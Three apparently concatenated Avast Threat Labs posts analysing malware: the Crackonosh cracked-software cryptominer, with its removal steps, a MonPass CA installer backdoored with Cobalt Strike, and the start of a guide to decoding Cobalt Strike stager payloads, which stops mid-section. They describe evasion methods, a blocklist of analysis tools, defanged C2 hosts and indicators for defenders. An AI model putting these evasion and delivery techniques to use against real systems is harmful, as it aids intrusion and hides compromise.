    • File 7B296FC0-376B-497d-B013-58F4D9633A22-5P-1.B5841A4C-A289-439d-8115-50AB69CD450
      • SHA1: F3764EC8078B4524428A8FC8119946F8E8D99A27
      • SHA256: 86CC68FBF440D4C61EEC18B08E817BB2C0C52B307E673AE3FFB91ED6E129B273
    • File 7B296FC0-376B-497d-B013-58F4D9633A22-5P-1.B5841A4C-A289-439d-8115-50AB69CD450B
      • SHA1: 1063489F4BDD043F72F1BED6FA03086AD1D1DE20
      • SHA256: 1A57A37EB4CD23813A25C131F3C6872ED175ABB6F1525F2FE15CFF4C077D5DF7
  • Searched in CSIDL_Profile and actual location is %localappdata%\Programs\Common
    • File UserAccountControlSettingsDevice.dat
      • SHA1: B53B0887B5FD97E3247D7D88D4369BFC449585C5
      • SHA256: 7BB5328FB53B5CD59046580C3756F736688CD298FE8846169F3C75F3526D3DA5

These files contain configuration information encrypted with xor cipher with the keys in executables. 

After decryption we found names of other parts of malware, some URLs, RSA public keys, communication keys for winrmsrv.exe and commands for XMRig. RSA keys are 8192 and 8912 bits long. These keys are used to verify every file downloaded by Crackonosh (via StartupCheckLibrary.dll, winrmsrv.exe, winscomrssrv.dll).

Here we found the first remark of wksprtcli.dll.

StartupCheckLibrary.dll and Download of wksprtcli.dll

StartupCheckLibrary.dll is the way how the author of Crackonosh can download updates of Crackonosh on infected machines. Startupchecklibrary.dll queries TXT DNS records for domains first[.]universalwebsolutions[.]info and second[.]universalwebsolutions[.]info (or other TLDs like getnewupdatesdownload[.]net and webpublicservices[.]org). There are TXT DNS records like [email protected]@@FEpHw7Hn33. From the first twelve letters it computes the IP address as shown on image. Next five characters are the digits of the port encrypted by adding 16. This gives us a socket, where to download wksprtcli.dll. The last eight characters are the version. Downloaded data is validated against one of the Public keys stored in the config file.

Decryption of IP address, screenshot from Ida

Wksprtcli.dll (exports DllGetClassObjectMain) is updating older versions of Crackonosh. The oldest version of wksprtcli.dll that we found checks only the nonexistence of winlogui.exe. Then it deletes diskdriver.exe (previous coinminer) and autostart registry entry. The newest version has a time frame when it runs. It deletes older versions of winlogui.exe or diskdriver.exe and drops new version of winlogui.exe. It drops new config files and installs winrmsrv.exe and winscomrssrv.dll. It also changed the way of starting winlogui.exe from registry HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run to a task scheduled on user login.

Tasks created in Windows task scheduler by wksprtcli.dll

In the end it disallows hibernation and Windows Defender. 

Wksprtcli.dll also checks computer time. The reason may be not to overwrite newer versions and to make dynamic analysis harder. It also has written date after which it to stop winlogui task to be able to replace files.

(time of compilation)
Timestamp 1
(after this it kills winlogui task, so it can update it)
Timestamp 2
(before this it runs)
5C8B… (2020-11-20) 2019-12-01 2023-12-30
D9EE… (2019-11-24) 2019-12-01 2020-12-06
194A… (2019-11-24) 2019-03-09
FA87… (2019-03-22) Uses winlogui size instead 2019-11-02
C234… (2019-02-24) 2019-03-09 2019-11-02
A2D0… (2018-12-27)
D3DD… (2018-10-13)
Hardcoded timestamps, full file hashes are in IoCs

Analysis of Winrmsrv.exe

Winrmsrv.exe is responsible for P2P connection of infected machines. It exchanges version info and it is able to download newer versions of Crackonosh. We didn’t find any evidence of versions higher than 0 and therefore we don’t know what files are transferred.

Winrmsrv.exe searches for internet connection. If it succeeds it derives three different ports in the following ways.

First, in the config file, there is offset (49863) and range (33575) defined. For every port there is computed SHA-256 from date (days from Unix Epoch time) and 10 B from config file. Every port is then set as offset plus the first word of SHA moduled by range (offset + (2 B of SHA % range)).

First two ports are used for incoming TCP connections. The last one is used to listen to an incoming UDP. 

Obtain ports, screenshot from IDA

Next, winrmsrv.exe starts sending UDP packets containing version and timestamp to random IP addresses to the third port (approximately 10 IP’s per second). Packet is prolonged with random bytes (to random length) and encrypted with a Vigenère cipher. 

UDP packet

Finally, if winrmsrv.exe finds an IP address infected with Crackonosh, it stores the IP, control version and starts updating the older one with the newer one. The update data is signed with the private key. On the next start winrmsrv.exe connects all stored IP’s to check the version before trying new ones. It blocks all IP addresses after the communication. It blocks them for 4 hours unless they didn’t follow the protocol, then the block is permanent (until restart).

We have modified masscan to check this protocol. It showed about 370 infected IP addresses over the internet (IPv4).

A UDP Hello B
Sends UDP Packet from random port to port 3 -> decrypt, check timestamp (in last 15 s) and if the version match ban IP address for next 4 hr
decrypt, check timestampsame version: do nothingB has lower version: TCP send B has higher version: TCP receive <- Sends UDP Crackonosh Hello Packet to port of A
A TCP Send B
Connect to port 2 -> Search if the communication from A is expected (Successful UDP Hello in last 5 seconds with different versions)
send encrypted packet -> decode data, validate, save
A TCP Receive B
Connect to port 1 -> Search if the communication from A is expected (Successful UDP Hello in last 5 seconds with different versions)
decode data, validate, save <- send encrypted packet
Communication diagram
Encryption scheme of the UDP Packet
Encryption scheme of the TCP Packet

It’s notable that here is a mistake in TCP encryption/decryption implementation shown above. Instead of the red arrow there is computed one more SHA256, that should be used in the xor with the initialization vector. But then there is the source of the SHA used instead of the result.

Analysis of winscomrssrv.dll

It is preparation for the next phase. It uses the TXT DNS records the same way as StratupCheckLibrary.dll. It tries to decode txt records on URL’s:

  • fgh[.]roboticseldomfutures[.]info
  • anter[.]roboticseldomfutures[.]info
  • any[.]tshirtcheapbusiness[.]net
  • lef[.]loadtubevideos[.]com
  • levi[.]loadtubevideos[.]com
  • gof[.]planetgoodimages[.]info
  • dus[.]bridgetowncityphotos[.]org
  • ofl[.]bridgetowncityphotos[.]org
  • duo[.]motortestingpublic[.]com
  • asw[.]animegogofilms[.]info
  • wc[.]animegogofilms[.]info
  • enu[.]andromediacenter[.]net
  • dnn[.]duckduckanimesdownload[.]net
  • vfog[.]duckduckanimesdownload[.]net
  • sto[.]genomdevelsites[.]org
  • sc[.]stocktradingservices[.]org
  • ali[.]stocktradingservices[.]org
  • fgo[.]darestopedunno[.]com
  • dvd[.]computerpartservices[.]info
  • efco[.]computerpartservices[.]info
  • plo[.]antropoledia[.]info
  • lp[.]junglewearshirts[.]net
  • um[.]junglewearshirts[.]net
  • fri[.]rainbowobservehome[.]net
  • internal[.]videoservicesxvid[.]com
  • daci[.]videoservicesxvid[.]com
  • dow[.]moonexploringfromhome[.]info
  • net[.]todayaniversarygifts[.]info
  • sego[.]todayaniversarygifts[.]info
  • pol[.]motorcyclesonthehighway[.]com
  • any[.]andycopyprinter[.]net
  • onl[.]andycopyprinter[.]net
  • cvh[.]cheapjewelleryathome[.]info
  • df[.]dvdstoreshopper[.]org
  • efr[.]dvdstoreshopper[.]org
  • Sdf[.]expensivecarshomerepair[.]com

It seems, that these files are not yet in the wild, but we know what the names of files should be 

C:\WINDOWS\System32\wrsrvrcomd0.dll, C:\WINDOWS\System32\winupdtemp_0.dat and C:\WINDOWS\System32\winuptddm0.

Anti-Detection and Anti-Forensics

As noted before, Crackonosh takes specific actions to evade security software and analysis.

Specific actions it takes to evade and disable security software includes:

  • Deleting antivirus software in safe mode
  • Stopping Windows Update
  • Replacing Windows Security with green tick system tray icon
  • Using libraries that don’t use the usual DllMain that is used when running library as the main executable (by rundll32.exe) but instead are started with some other exported functions.
  • Serviceinstaller tests if it is running in Safe mode

To protect against analysis, it takes the following actions to test to determine if it’s running in a VM:

  • Checks registry keys:
    • SOFTWARE\VMware, Inc
    • SOFTWARE\Microsoft\Virtual Machine\Guest\Parameters
    • SOFTWARE\Oracle\VirtualBox Guest Additions
  • Test if computer time is in some reasonable interval e.g. after creation of malware and before 2023 (wksprtcli.dll)

Also, as noted it delays running to better hide itself. We found the specific installers used hard coded dates and times for its delay as shown below.

SHA of installer Installer doesn’t run before
9EC3DE9BB9462821B5D034D43A9A5DE0715FF741E0C171ADFD7697134B936FA3 2018-06-10 13:08:20
8C52E5CC07710BF7F8B51B075D9F25CD2ECE58FD11D2944C6AB9BF62B7FBFA05 2018-06-19 14:06:37
93A3B50069C463B1158A9BB3A8E3EDF9767E8F412C1140903B9FE674D81E32F0 2018-07-04 17:33:20
6A3C8A3CA0376E295A2A9005DFBA0EB55D37D5B7BF8FCF108F4FFF7778F47584 2018-07-10 15:35:57
4B01A9C1C7F0AF74AA1DA11F8BB3FC8ECC3719C2C6F4AD820B31108923AC7B71 2018-07-25 13:56:35
65F39206FE7B706DED5D7A2DB74E900D4FAE539421C3167233139B5B5E125B8A 2018-08-03 15:50:40
C6817D6AFECDB89485887C0EE2B7AC84E4180323284E53994EF70B89C77768E1 2018-08-14 12:36:30
7F836B445D979870172FA108A47BA953B0C02D2076CAC22A5953EB05A683EDD4 2018-09-13 12:29:50
D8C092DE1BF9B355E9799105B146BAAB8C77C4449EAD2BDC4A5875769BB3FB8A 2018-10-01 13:52:22
E497EE189E16CAEF7C881C1C311D994AE75695C5087D09051BE59B0F0051A6CF 2018-10-19 14:15:35
D7A9BF98ACA2913699B234219FF8FDAA0F635E5DD3754B23D03D5C3441D94BFB 2018-11-07 12:47:30
Hardcoded timestamps in installers

We also found a version, Winrmsrv.exe (5B85CEB558BAADED794E4DB8B8279E2AC42405896B143A63F8A334E6C6BBA3FB), that instead decrypts time that is hard-coded in config file (for example in 5AB27EAB926755620C948E7F7A1FDC957C657AEB285F449A4A32EF8B1ADD92AC ) is 2020-02-03. If current system time is lower than the extracted value, winrmsrv.exe doesn’t run.

It also takes specific actions to hide itself from possible power users who use tools that could disclose its presence.

It uses Windows-like names and descriptions such as winlogui.exe which is the Windows Logon GUI Application.

It also checks running processes and compares it to the blocklist below. If it finds process with specified name winrmsrv.exe and winlogui.exe terminate itself and wait until the next start of PC.

  • Blocklist:
    • dumpcap.exe
    • fiddler.exe 
    • frst.exe 
    • frst64.exe 
    • fse2.exe 
    • mbar.exe 
    • messageanalyzer.exe 
    • netmon.exe 
    • networkminer.exe 
    • ollydbg.exe 
    • procdump.exe 
    • procdump64.exe 
    • procexp.exe 
    • procexp64.exe 
    • procmon.exe 
    • procmon64.exe 
    • rawshark.exe 
    • rootkitremover.exe 
    • sdscan.exe 
    • sdwelcome.exe 
    • splunk.exe 
    • splunkd.exe 
    • spyhunter4.exe 
    • taskmgr.exe
    • tshark.exe 
    • windbg.exe 
    • wireshark-gtk.exe 
    • wireshark.exe 
    • x32dbg.exe 
    • x64dbg.exe 
    • X96dbg.exe

Additional files

As well as previously discussed, our research found additional files:

  • Startupcheck.vbs: a one time script to create a Windows Task Scheduler task for StartUpCheckLibrary.dll.
  • Winlogui.dat, wslogon???.dat: temporary files to be moved as new winlogui.exe.
  • Perfdish001.dat: a list of infected IP addresses winrmsrv.exe found.
  • Install.msi and Install.vbs: these are in some versions a step between maintenance.vbs and serviceinstaller.msi, containing commands that are otherwise in maintenance.vbs.

Removal of Crackonosh

Based on our analysis, the following steps are required to fully remove Crackonosh.

Delete the following Scheduled Tasks (Task Schedulers)

  • Microsoft\Windows\Maintenance\InstallWinSAT
  • Microsoft\Windows\Application Experience\StartupCheckLibrary
  • Microsoft\Windows\WDI\SrvHost\
  • Microsoft\Windows\Wininet\Winlogui\
  • Microsoft\Windows\Windows Error Reporting\winrmsrv\

Delete the following files from c:\Windows\system32\

  • 7B296FC0-376B-497d-B013-58F4D9633A22-5P-1.B5841A4C-A289-439d-8115-50AB69CD450
  • 7B296FC0-376B-497d-B013-58F4D9633A22-5P-1.B5841A4C-A289-439d-8115-50AB69CD450B
  • diskdriver.exe
  • maintenance.vbs
  • serviceinstaller.exe
  • serviceinstaller.msi
  • startupcheck.vbs
  • startupchecklibrary.dll
  • windfn.exe
  • winlogui.exe
  • winrmsrv.exe
  • winscomrssrv.dll
  • wksprtcli.dll

Delete the following file from C:\Documents and Settings\All Users\Local Settings\Application Data\Programs\Common (%localappdata%\Programs\Common)

  • UserAccountControlSettingsDevice.dat

Delete the following file from C:\Program Files\Windows Defender\

  • MSASCuiL.exe

Delete the following Windows registry keys (using regedit.exe)

  • HKLM\SOFTWARE\Policies\Microsoft\Windows Defender value DisableAntiSpyware
  • HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection value DisableBehaviorMonitoring
  • HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection value DisableOnAccessProtection
  • HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection value DisableScanOnRealtimeEnable
  • HKLM\SOFTWARE\Microsoft\Security Center value AntiVirusDisableNotify
  • HKLM\SOFTWARE\Microsoft\Security Center value FirewallDisableNotify
  • HKLM\SOFTWARE\Microsoft\Security Center value UpdatesDisableNotify
  • HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer value HideSCAHealth
  • HKLM\SOFTWARE\Microsoft\Windows Defender\Reporting value DisableEnhancedNotifications
  • HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run value winlogui

Restore the following default Windows services (Note: depends on your OS version – see

  • wuauserv
  • SecurityHealthService
  • WinDefend
  • Sense
  • MsMpSvc

Reinstall Windows Defender and any third-party security software, if any was installed.

Error messages

On infected machines, sometimes the following error messages about the file Maintenance.vbs can appear.

Type Mismatch: ‘CInt’, Code: 800A000D
Can not find script file

Both of these are bugs in the Crackonosh installation.

Although there are some guides on the internet on how to resolve these errors, instead we recommend following the steps in the previous chapter to be sure you fully remove all traces of Crackonosh.


Crackonosh installs itself by replacing critical Windows system files and abusing the Windows Safe mode to impair system defenses.

This malware further protects itself by disabling security software, operating system updates and employs other anti-analysis techniques to prevent discovery, making it very difficult to detect and remove.

In summary, Crackonosh shows the risks in downloading cracked software and demonstrates that it is highly profitable for attackers. Crackonosh has been circulating since at least June 2018 and has yielded over $2,000,000 USD for its authors in Monero from over 222,000 infected systems worldwide.

As long as people continue to download cracked software, attacks like these will continue to be profitable for attackers. The key take-away from this is that you really can’t get something for nothing and when you try to steal software, odds are someone is trying to steal from you.

Indicators of Compromise (IoCs)

Public keys


The post Crackonosh: A New Malware Distributed in Cracked Software appeared first on Avast Threat Labs.

Backdoored Client from Mongolian CA MonPass


We discovered an installer downloaded from the official website of MonPass, a major certification authority (CA) in Mongolia in East Asia that was backdoored with Cobalt Strike binaries. We immediately notified MonPass on 22 April 2021 of our findings and encouraged them to address their compromised server and notify those who downloaded the backdoored client.

We have confirmed with MonPass that they have taken steps to address these issues and are now presenting our analysis.

Our analysis beginning in April 2021 indicates that a public web server hosted by MonPass was breached potentially eight separate times: we found eight different webshells and backdoors on this server. We also found that the MonPass client available for download from 8 February 2021 until 3 March 2021 was backdoored. 

This research provides analysis of relevant backdoored installers and other samples that we found occurring in the wild. Also during our investigation we observed relevant research from NTT Ltd so some technical details or IoCs may overlap.

All the samples are highly similar and share the same pdb path:

C:\Users\test\Desktop\fishmaster\x64\Release\fishmaster.pdb and the string: Bidenhappyhappyhappy.

Figure 1: Pdb path and specific string

Technical details

The malicious installer is an unsigned PE file. It starts by downloading the legitimate version of the installer from the MonPass official website. This legitimate version is dropped to the C:\Users\Public\ folder and executed under a new process. This guarantees that the installer behaves as expected, meaning that a regular user is unlikely to notice anything suspicious.

Additional similar installers were also found in the wild, with SHA256 hashes:  e2596f015378234d9308549f08bcdca8eadbf69e488355cddc9c2425f77b7535 and f21a9c69bfca6f0633ba1e669e5cf86bd8fc55b2529cd9b064ff9e2e129525e8.

Figure 2: This image is not as innocent as it may seem.

The attackers decided to use steganography to transfer shellcode to their victims. On execution, the malware downloads a bitmap image file from[.]ml:8880/download/37.bmp as shown in figure 2

The download is performed slightly unusually in two HTTP requests. The first request uses the HEAD method to retrieve the Content-Length, followed by a second GET request to actually download the image. After the picture is downloaded, the malware extracts the encrypted payload as follows. The hidden data is expected to be up to 0x76C bytes. Starting with the 3rd byte in image data it copies each 4th byte. The resulting data represents an ASCII string of hexadecimal characters which is later decoded into their respective binary values. These bytes are then XOR decrypted using the hardcoded key miat_mg, resulting in a Cobalt-Strike beacon.

We have seen multiple versions of this backdoored installer, each with slightly modified decryptors. 

In version (f21a9c69bfca6f0633ba1e669e5cf86bd8fc55b2529cd9b064ff9e2e129525e8) the XOR decryption was stripped.

In the version (e2596f015378234d9308549f08bcdca8eadbf69e488355cddc9c2425f77b7535) basic anti-analysis tricks were stripped. In Figure 3, you can see different time stamps and the same rich headers.

Figure 3: Timestamps
Figure 4: Rich header.

In the backdoored installer we also observed some basic anti-analysis techniques used in an attempt to avoid detection. In particular, we observed checks for the number of processors using the GetSystemInfo function, the amount of physical memory using the GlobalMemoryStatusEx function and the disk capacity using the IOCTL_DISK_GET_DRIVE_GEOMETRY IOCTL call. If any of the obtained values are suspiciously low, the malware terminates immediately.

Figure 5: Anti-analysis techniques employed by the malware

Figure 6: Anti-analysis technique testing for disk capacity

One of the samples (9834945A07CF20A0BE1D70A8F7C2AA8A90E625FA86E744E539B5FE3676EF14A9) used a different known technique to execute shellcode. First it is decoded from a list of UUIDs with UuidFromStringA API, then it is executed using EnumSystemLanguageGroupsA.

Figure 7:Decoding list from UUIDs and executing shellcode.

After we found a backdoored installer in one of our customers,  we commenced hunting for additional samples in VT and in our user-base, to determine if there were more backdoored installers observed in the wild. In VT we found some interesting hits:

Figure 8: VT hit

We analyzed the sample and found out that the sample was very similar to infected installers found in our customers. The sample contained anti-analysis techniques using the same XOR decryption and also contained similar C2 server addresses (hxxp:// as observed in previous backdoored installers. The sample also contained references to the link (hxxps://webplus-cn-hongkong-s-5faf81e0d937f14c9ddbe5a0.oss-cn-hongkong.aliyuncs[.]com/Silverlight_ins.exe) and the file path C:\users\public\Silverlight_ins.exe; however these did not appear to be in use. The sample name is also unusual –  Browser_plugin (8).exe – we speculate that this may be a test sample uploaded by the actor. 

In VT we saw another hash (4a43fa8a3305c2a17f6a383fb68f02515f589ba112c6e95f570ce421cc690910) again with the name Browser_plugin.exe. According to VT this sample has been downloaded from hxxps:// It was downloading a PDF from hxxp:// PDF file Aili.pdf.

Figure 9: Content of Aili.pdf.

Afterwards it has the similar functionalities as previously mentioned samples from VT. That means it was downloading and decrypting Cobalt strike beacon from hxxp://

In our database we again found the similar sample but with the name Browser_plugin (1).exe. This sample was downloaded from hxxp://, we saw it on Feb 4, 2021. It doesn’t install any legitimate software, it just shows a MessageBox. It contains C&C address (hxxp://, (Note: there is a typo in the directory name: downloa). 

Compromised Web server content

On the breached web server, where you were able to download backdoored installer we found two executables DNS.exe (456b69628caa3edf828f4ba987223812cbe5bbf91e6bbf167e21bef25de7c9d2) and again Browser_plugin.exe (5cebdb91c7fc3abac1248deea6ed6b87fde621d0d407923de7e1365ce13d6dbe). 


It downloads from (hxxp:// C&C server bat file, that is saved in C:\users\public\DNS.bat. It contains this script:

Figure 10: DNS.bat script

In the second part of the instance, it contains the similar functionality and the same address of C&C server as the backdoored installer that we mentioned earlier. 



This sample is very similar to this one (4a43fa8a3305c2a17f6a383fb68f02515f589ba112c6e95f570ce421cc690910) with the same address of C&C server, but it doesn’t download any additional document. 

C&C server analysis

We checked the malicious web server hxxps://, from where (4A43FA8A3305C2A17F6A383FB68F02515F589BA112C6E95F570CE421CC690910) Browser_plugin.exe has been downloading. The malicious web server looks identical to the legitimate one the difference is the certificate. The legitimate server is signed by Sectigo Limited while the malicious server is signed by Cloudflare, Inc.

Figure 11: Comparing two sites


This blog post outlines our findings regarding the MonPass client backdoored with Cobalt Strike. 

In our research we found additional variants on VirusTotal in addition to those we found on the compromised MonPass web server. 

In our analysis of the compromised client and variants, we’ve shown that the malware was using steganography to decrypt Cobalt Strike beacon. 

At this time, we’re not able to make attribution of these attacks with an appropriate level of confidence. However it’s clear that the attackers clearly intended to spread malware to users in Mongolia by compromising a trustworthy source, which in this case is a CA in Mongolia.

Most importantly, anyone that has downloaded the MonPass client between 8 February 2021 until 3 March 2021 should take steps to look for and remove the client and the backdoor it installed. 

I would like to thank Jan Rubín for helping me with this research.

Timeline of communication:

  • March 24. 2021 – Discovered backdoored installer
  • April 8. 2021 – Initial contact with Monpass through MN CERT/CC providing findings.
  • April 20. 2021 – MonPass shared a forensic image of an infected web server with Avast Threat Labs.
  • April 22. 2021 – Avast provided information about the incident and findings from the forensics image in a call with MonPass and MN CERT/CC.
  • May 3. 2021 – Avast followed up with MonPass in email. No response.
  • May 10. 2021 – Avast sent additional follow up email.
  • June 4, 2021 – MonPass replied asking for information already provided on April 22, 2021.
  • June 14. 2021 – Follow up from Avast to MonPass, no response
  • June 29, 2021 – Final email to MonPass indicating our plans to publish with a draft of the blog for feedback.
  • June 29, 2021 – Information from MonPass indicating they’ve resolved the issues and notified affected customers.
  • July 1, 2021 – Blog published.

Indicators of Compromise (IoC)

Timeline of compilation timestamps:

date & time (UTC) SHA256
Feb  3, 2021 07:17:14 28e050d086e7d055764213ab95104a0e7319732c041f947207229ec7dfcd72c8
Feb 26, 2021 07:16:23 f21a9c69bfca6f0633ba1e669e5cf86bd8fc55b2529cd9b064ff9e2e129525e8
Mar  1, 2021 07:56:04 e2596f015378234d9308549f08bcdca8eadbf69e488355cddc9c2425f77b7535
Mar  4, 2021 02:22:53 456b69628caa3edf828f4ba987223812cbe5bbf91e6bbf167e21bef25de7c9d2
Mar 12, 2021 06:25:25 a7e9e2bec3ad283a9a0b130034e822c8b6dfd26dda855f883a3a4ff785514f97
Mar 16, 2021 02:25:40 5cebdb91c7fc3abac1248deea6ed6b87fde621d0d407923de7e1365ce13d6dbe
Mar 18, 2021 06:43:24 379d5eef082825d71f199ab8b9b6107c764b7d77cf04c2af1adee67b356b5c7a
Mar 26, 2021 08:17:29 9834945a07cf20a0be1d70a8f7c2aa8a90e625fa86e744e539b5fe3676ef14a9
Apr 6, 2021 03:11:40 4a43fa8a3305c2a17f6a383fb68f02515f589ba112c6e95f570ce421cc690910

The post Backdoored Client from Mongolian CA MonPass appeared first on Avast Threat Labs.

Decoding Cobalt Strike: Understanding Payloads


Cobalt Strike threat emulation software is the de facto standard closed-source/paid tool used by infosec teams in many governments, organizations and companies. It is also very popular in many cybercrime groups which usually abuse cracked or leaked versions of Cobalt Strike. 

Cobalt Strike has multiple unique features, secure communication and it is fully modular and customizable so proper detection and attribution can be problematic. It is the main reason why we have seen use of Cobalt Strike in almost every major cyber security incident or big breach for the past several years.

There are many great articles about reverse engineering Cobalt Strike software, especially beacon modules as the most important part of the whole chain. Other modules and payloads are very often overlooked, but these parts also contain valuable information for malware researchers and forensic analysts or investigators.

The first part of this series is dedicated to proper identification of all raw payload types and how to decode and parse them. We also share our useful parsers, scripts and yara rules based on these findings back to the community

Raw payloads

Cobalt Strike’s payloads are based on Meterpreter shellcodes and include many similarities like API hashing (x86 and x64 versions) or url query checksum8 algo used in http/https payloads, which makes identification harder. This particular checksum8 algorithm is also used in other frameworks like Empire.

Let’s describe interesting parts of each payload separately.

Payload header x86 variant

Default 32bit raw payload’s entry points start with typical instruction CLD (0xFC) followed by CALL instruction and PUSHA (0x60) as the first instruction from API hash algorithm.

x86 payload
Payload header x64 variant

Standard 64bit variants start also with CLD instruction followed by AND RSP,-10h and CALL instruction.

x64 payload

We can use these patterns for locating payloads’ entry points and count other fixed offsets from this position.

Default API hashes

Raw payloads have a predefined structure and binary format with particular placeholders for each customizable value such as DNS queries, HTTP headers or C2 IP address. Placeholder offsets are on fixed positions the same as hard coded API hash values. The hash algorithm is ROR13 and the final hash is calculated from the API function name and DLL name. The whole algorithm is nicely commented inside assembly code on the Metasploit repository.

Python implementation of API hashing algorithm

We can use the following regex patterns for searching hardcoded API hashes:

We can use a known API hashes list for proper payload type identification and known fixed positions of API hashes for more accurate detection via Yara rules.

Payload identification via known API hashes

Complete Cobalt Strike API hash list:

API hash DLL and API name
0xc99cc96a dnsapi.dll_DnsQuery_A
0x528796c6 kernel32.dll_CloseHandle
0xe27d6f28 kernel32.dll_ConnectNamedPipe
0xd4df7045 kernel32.dll_CreateNamedPipeA
0xfcddfac0 kernel32.dll_DisconnectNamedPipe
0x56a2b5f0 kernel32.dll_ExitProcess
0x5de2c5aa kernel32.dll_GetLastError
0x0726774c kernel32.dll_LoadLibraryA
0xcc8e00f4 kernel32.dll_lstrlenA
0xe035f044 kernel32.dll_Sleep
0xbb5f9ead kernel32.dll_ReadFile
0xe553a458 kernel32.dll_VirtualAlloc
0x315e2145 user32.dll_GetDesktopWindow
0x3b2e55eb wininet.dll_HttpOpenRequestA
0x7b18062d wininet.dll_HttpSendRequestA
0xc69f8957 wininet.dll_InternetConnectA
0x0be057b7 wininet.dll_InternetErrorDlg
0xa779563a wininet.dll_InternetOpenA
0xe2899612 wininet.dll_InternetReadFile
0x869e4675 wininet.dll_InternetSetOptionA
0xe13bec74 ws2_32.dll_accept
0x6737dbc2 ws2_32.dll_bind
0x614d6e75 ws2_32.dll_closesocket
0x6174a599 ws2_32.dll_connect
0xff38e9b7 ws2_32.dll_listen
0x5fc8d902 ws2_32.dll_recv
0xe0df0fea ws2_32.dll_WSASocketA
0x006b8029 ws2_32.dll_WSAStartup

Complete API hash list for Windows 10 system DLLs is available here.

Customer ID / Watermark

Based on information provided on official web pages, Customer ID is a 4-byte number associated with the Cobalt Strike licence key and since v3.9 is embedded into the payloads and beacon configs. This number is located at the end of the payload if it is present. Customer ID could be used for specific threat authors identification or attribution, but a lot of Customer IDs are from cracked or leaked versions, so please consider this while looking at these for possible attribution.

DNS stager x86

Typical payload size is 515 bytes or 519 bytes with included Customer ID value. The DNS query name string starts on offset 0x0140 (calculated from payload entry point) and the null byte and max string size is 63 bytes. If the DNS query name string is shorter, then is terminated with a null byte and the rest of the string space is filled with junk bytes.

DnsQuery_A API function is called with two default parameters:

Parameter Value Constant
DNS Record Type (wType) 0x0010 DNS_TYPE_TEXT
DNS Query Options (Options) 0x0248 DNS_QUERY_BYPASS_CACHE

Anything other than the default values are suspicious and could indicate custom payload.

Python parsing:

Default DNS payload API hashes:

Offset Hash value API name
0x00a3 0xe553a458 kernel32.dll_VirtualAlloc
0x00bd 0x0726774c kernel32.dll_LoadLibraryA
0x012f 0xc99cc96a dnsapi.dll_DnsQuery_A
0x0198 0x56a2b5f0 kernel32.dll_ExitProcess
0x01a4 0xe035f044 kernel32.dll_Sleep
0x01e4 0xcc8e00f4 kernel32.dll_lstrlenA

Yara rule for DNS stagers:

SMB stager x86

The default payload size is 346 bytes plus the length of the pipe name string terminated by a null byte and the length of the Customer ID if present. The pipe name string is located right after the payload code on offset 0x015A in plaintext format.

CreateNamedPipeA API function is called with 3 default parameters:

Parameter Value Constant
Open Mode (dwOpenMode) 0x0003 PIPE_ACCESS_DUPLEX
Max Instances (nMaxInstances) 0x0001

Python parsing:

Default SMB payload API hashes:

Offset Hash value API name
0x00a1 0xe553a458 kernel32.dll_VirtualAlloc
0x00c4 0xd4df7045 kernel32.dll_CreateNamedPipeA
0x00d2 0xe27d6f28 kernel32.dll_ConnectNamedPipe
0x00f8 0xbb5f9ead kernel32.dll_ReadFile
0x010d 0xbb5f9ead kernel32.dll_ReadFile
0x0131 0xfcddfac0 kernel32.dll_DisconnectNamedPipe
0x0139 0x528796c6 kernel32.dll_CloseHandle
0x014b 0x56a2b5f0 kernel32.dll_ExitProcess

Yara rule for SMB stagers:

TCP Bind stager x86

The payload size is 332 bytes plus the length of the Customer ID if present. Parameters for the bind API function are stored inside the SOCKADDR_IN structure hardcoded as two dword pushes. The first PUSH with the sin_addr value is located on offset 0x00C4. The second PUSH contains sin_port and sin_family values and is located on offset 0x00C9 The default sin_family value is AF_INET (0x02).

Python parsing:

Default TCP Bind x86 payload API hashes:

Offset Hash value API name
0x009c 0x0726774c kernel32.dll_LoadLibraryA
0x00ac 0x006b8029 ws2_32.dll_WSAStartup
0x00bb 0xe0df0fea ws2_32.dll_WSASocketA
0x00d5 0x6737dbc2 ws2_32.dll_bind
0x00de 0xff38e9b7 ws2_32.dll_listen
0x00e8 0xe13bec74 ws2_32.dll_accept
0x00f1 0x614d6e75 ws2_32.dll_closesocket
0x00fa 0x56a2b5f0 kernel32.dll_ExitProcess
0x0107 0x5fc8d902 ws2_32.dll_recv
0x011a 0xe553a458 kernel32.dll_VirtualAlloc
0x0128 0x5fc8d902 ws2_32.dll_recv
0x013d 0x614d6e75 ws2_32.dll_closesocket

Yara rule for TCP Bind x86 stagers:

TCP Bind stager x64

The payload size is 510 bytes plus the length of the Customer ID if present. The SOCKADDR_IN structure is hard coded inside the MOV instruction as a qword and contains the whole structure. The offset for the MOV instruction is 0x00EC.

Python parsing:

Default TCP Bind x64 payload API hashes:

Offset Hash value API name
0x0100 0x0726774c kernel32.dll_LoadLibraryA
0x0111 0x006b8029 ws2_32.dll_WSAStartup
0x012d 0xe0df0fea ws2_32.dll_WSASocketA
0x0142 0x6737dbc2 ws2_32.dll_bind
0x0150 0xff38e9b7 ws2_32.dll_listen
0x0161 0xe13bec74 ws2_32.dll_accept
0x016f 0x614d6e75 ws2_32.dll_closesocket
0x0198 0x5fc8d902 ws2_32.dll_recv
0x01b8 0xe553a458 kernel32.dll_VirtualAlloc
0x01d2 0x5fc8d902 ws2_32.dll_recv
0x01ee 0x614d6e75 ws2_32.dll_closesocket

Yara rule for TCP Bind x64 stagers:

TCP Reverse stager x86

The payload size is 290 bytes plus the length of the Customer ID if present. This payload is very similar to TCP Bind x86 and SOCKADDR_IN structure is hardcoded on the same offset with the same double push instructions so we can reuse python parsing code from TCP Bind x86 payload.

Default TCP Reverse x86 payload API hashes:

Offset Hash value API name
0x009c 0x0726774c kernel32.dll_LoadLibraryA
0x00ac 0x006b8029 ws2_32.dll_WSAStartup
0x00bb 0xe0df0fea ws2_32.dll_WSASocketA
0x00d5 0x6174a599 ws2_32.dll_connect
0x00e5 0x56a2b5f0 kernel32.dll_ExitProcess
0x00f2 0x5fc8d902 ws2_32.dll_recv
0x0105 0xe553a458 kernel32.dll_VirtualAlloc
0x0113 0x5fc8d902 ws2_32.dll_recv

Yara rule for TCP Reverse x86 stagers:

TCP Reverse stager x64

